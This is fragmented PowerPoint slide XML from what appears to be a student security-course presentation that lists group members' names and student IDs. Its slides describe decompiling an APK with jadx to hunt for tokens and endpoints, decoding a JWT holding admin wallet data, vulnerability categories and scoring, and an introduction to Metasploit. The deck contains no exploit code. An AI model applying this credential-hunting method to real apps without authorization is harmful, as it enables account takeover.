726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2391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1319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A76E-A0C7-A583-93C0-D4A127AA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48393-FDFB-D21A-9D61-33013AFB7A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8CE54-3D1A-7AEC-0F48-064F33106148}"/>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A948A615-C3C0-4124-953D-97D67A8D4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EBBDE-68BB-CB02-83F2-2F4371278B1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495332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0770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61558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9473-0184-E531-7923-68D3BF5DD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D254CC-6973-CF25-C1AB-B6C2579D7D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FC14E-F122-926F-7F1F-3E710D2B01DE}"/>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E193D6BB-F385-C8FA-74E6-1980B721D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5885D-F70C-5C15-3CD7-BB72F092671D}"/>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52631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3D68-2C47-D83A-CAD3-1413865E43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9CB4C-9EDC-0336-0D44-86588D5EA3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D96876-3E36-7508-D8C7-C0161B777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B0A0A5-7890-A940-E345-92295B744FFE}"/>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D3542492-9D1D-5924-9DF3-9268290AD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8D662-4820-BC20-2A65-870003AAE3FC}"/>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59931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08C7-4B3E-A134-FBB7-0EAB9B307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C195AA-CD15-BB2F-233A-915786F35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5767D-74A4-A9AE-8215-0D396F29E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20FF07-674B-A928-1C3D-358842EF88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29B720-20E9-D8DD-0E26-F83D500EE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0AAA7A-498B-3F3C-82D3-BDE425C1D134}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D837B86F-5E86-4AB1-19C2-8A2807998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D14D6C-1B32-C160-8493-F944B44D8C5E}"/>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63787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3CFC-5FC2-A44A-2294-DA16CF50DC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5781C7-AA51-4B87-7B31-E53BD52C554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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D4D2FF9-E0D2-92F9-6DEF-DD24439568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E278-E0E8-DDD5-1CEF-023111E8685F}"/>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77176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88AEA2-8C35-06C3-2C64-CE920ED95C8D}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22135427-8A72-1D55-9BBF-6C9E72A345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BAAC7-0425-A1C1-A760-B91730E099AC}"/>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0210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4423-1DF0-8608-B882-B06ECCC7D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5FAF-D382-119B-9DEE-093FD8DCE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A7C45E-36FB-6FDC-0D02-6475BFBBF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2BF1C-08BE-30A3-7DC8-FE3F3461ACF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E281CBF6-0F8D-F24D-CCA6-E95D9D42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9F0DF-030F-CFD2-0EC6-3703320CEA22}"/>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92932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DC4C-D2BB-73C4-5866-8CE4154C7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DA547E-F198-1C6A-E911-701B601D2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4D7AE-D07D-C2EC-9F1D-AB105A2B8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7B971-9ECC-1F28-708B-34282D5E162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353549B5-3F8F-8F7D-9E66-0B22C2BB7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D9C33-3B75-8D3C-F735-4D92ACE6594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86399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FB465-EDB6-829A-7021-5D3319C41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0107F2-4CF6-AE1B-B151-689AFD70C2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BBDCF-1FF6-5720-7225-D8E455EB7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2150E3C4-BA86-7EC0-9FCF-27D65C12C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754E5D-6A59-0CE7-C07D-C4DC2D3B3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DEABAB-CBE3-4A1A-81A9-A805E0A4BAB1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20333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90E33B-E2AF-40EE-3224-374B01702087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="994558"/>
            <a:ext cx="5678011" cy="3163224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Group Anonymous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{090EB24E-7018-4DFB-CBBD-CBDD2ADA699E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-55592" y="1936594"/>
            <a:ext cx="6774425" cy="4049485"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>1-Group Admin : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>Mohab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> Yaser :21028727</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>2-Mina Ghattas : 21000168</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>3-Abram Anwar : 21006656</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>4-Mohamed Wael :1110152495</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> 5-Malak Osama : 21023606</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>6-Nourhan Ayman : 21027887</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>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mask&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98C8711-F410-07DA-63B5-B1287DCE3616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="-2" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6663241" y="1064674"/>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40730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25422-FF11-9A91-0CA1-2BE482CCC109}"/>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600" b="1" dirty="0"/>
              <a:t>Information Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" b="1"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5BED1796-4FFF-C9F5-3222-33AC0EBAD710}"/>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rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>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Extracted the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jadx</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endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83420886-8EBA-BC78-ED3A-1B152901292C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637989" y="967869"/>
            <a:ext cx="6348911" cy="4922262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27956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A6ACF0-C25B-F30D-2FDA-C4394416D242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046746" y="586822"/>
            <a:ext cx="3560252" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Static Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="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BDE4E51-C192-7B8F-B6F7-3CF75CE53DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351164" y="586822"/>
            <a:ext cx="6002636" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kept searching for important keys like passwords or hashes or tokens to get from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file until I got a JWT token, two subdomains and several Endpoints that we can use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer code&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4569B875-44DE-9CB9-64DA-E9A3EB01A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2968736"/>
            <a:ext cx="11164824" cy="3014503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007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8B64D1-789E-7313-20D1-5D68551FACD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83FD2-0FB7-FCE6-C539-7512C252F483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793662" y="386930"/>
            <a:ext cx="10066122" cy="1298448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Analysis of Gathered Data (Vulnerability Identification)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600"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34E4D-C370-5DB5-34A4-F686C8BFA1B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793661" y="2599509"/>
            <a:ext cx="4530898" cy="3639450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I tried to see what the token hold in it, so I decrypted it by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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As shown in the figure above, it holds data about an admin and his wallet id.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" kern="100" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EF2524-357D-5470-8638-594323D08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559" y="2599509"/>
            <a:ext cx="6058803" cy="349649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19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54A2FF-477E-D779-42E9-DE7A858673B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7B4D16-7225-015C-4645-9CC6C207464F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="548640"/>
            <a:ext cx="10168128" cy="1179576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>What are Vulnerabilities?</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group of people in black masks&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5748AD-2ABB-ABBC-2599-BF2058689E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="4847" r="5192" b="1"/>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85F2CE15-11D5-C348-7F43-294BA356778E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411453" y="2478024"/>
            <a:ext cx="3872243" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Malak Osama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="518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254FF-D564-52E6-2F5B-2C1CF1680F7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EFE5C-5066-1B46-1FC9-1890B8516261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="808637" y="386930"/>
            <a:ext cx="10208407" cy="1188950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Importance of Understanding Vulnerabilities</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BAADC00-048D-F4FB-B482-4DA3518A2C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683599764"/>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34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9EC84C-A9FB-87AA-118B-1B03D71AEE2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4D3B3-AC76-37A6-EC9E-E5529BB1AC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621792" y="1161288"/>
            <a:ext cx="3602736" cy="4526280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Vulnerability Categories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1A7DA64-58A3-7EF2-E973-EACA8B32E326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405980353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19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8FDB9C-D3DE-8D5C-620B-C78263781743}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A close-up of a white surface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90994DA4-E76C-B820-DD12-6207EBD904FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:schemeClr val="bg2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect t="15568" r="9091" b="7535"/>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A6345-AAE9-3CC9-6A35-BC5BC7BD2465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Vulnerability Scoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325FA064-63B6-9E2B-F56B-93FB487EB949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436801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60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3A9C5-5330-020F-E013-F28D3B67C8D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1641752"/>
            <a:ext cx="4391024" cy="1323439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction to Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8959183-25E1-2F5D-7673-195A3F01C1AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4925962"/>
            <a:ext cx="4391024" cy="1082726"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Malak Osama</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A logo with a shield and a letter n&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F365D8AB-3546-C468-B710-33E63F41A9CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
